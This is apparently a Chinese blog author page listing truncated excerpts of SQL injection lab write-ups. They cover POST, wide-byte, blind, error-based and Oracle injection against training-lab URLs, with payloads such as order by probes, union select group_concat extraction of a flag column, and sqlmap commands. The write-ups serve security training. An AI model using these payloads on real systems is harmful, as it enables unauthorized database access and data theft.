Track 实习学员

18534715561

2关注
0粉丝
36文章
返回网站首页

您已发布 36篇文章作品写文章

SQL注入-Post注入Rank 1

1. 在登陆框输入   username:admin           password:password看到提示的语句,开始实施注入2. 因为没有该死waf,所以直接注入构造payload:' order by 3#最后得到有 2列3.继续注入得到回显的位置,一般可以

 2019-2-17
 0 
 74 

6.3.1-SQL注入-宽字节注入Rank 1 2

测试输入单引号,发现被转义了,输入 /'                      ///'                  /////'   

 2019-2-15
 0 
 18 

盲注 bank 2

寻找闭合语句,闭合成功后根据我上一篇文章找思路下面我演示sqlmap注入过程1.sqlmap -u http://120.203.13.75:8150/New/BlindBased/RankTwo/sql-two/?id=1 --dbs     看是否可以注入2.sqlmap -u http://120.203.13.75:8150/New/BlindBas

 2019-2-15
 0 
 14 

6.2.1-SQL注入-盲注Rank 1 (Rank: 5)

1.http://120.203.13.75:8150/New/BlindBased/RankOne/sql-one/?id=1'  and  length(database())=8 --+                     判断数据库长度2.http://120

 2019-2-15
 0 
 22 

显错注入 2 3 4

1.  http://120.203.13.75:8150/New/ErrorBased/RankTwo/sql-two/?id=1 and 1=2  union select 1,2,group_concat(flag,0x3a,zKaQ) from zkaq --+         &

 2019-2-15
 0 
 6 

Oracle注入- 报错注入

1. http://o1.lab.aqlab.cn:81/?id=1' --+                                           &nbs

 2019-2-14
 0 
 22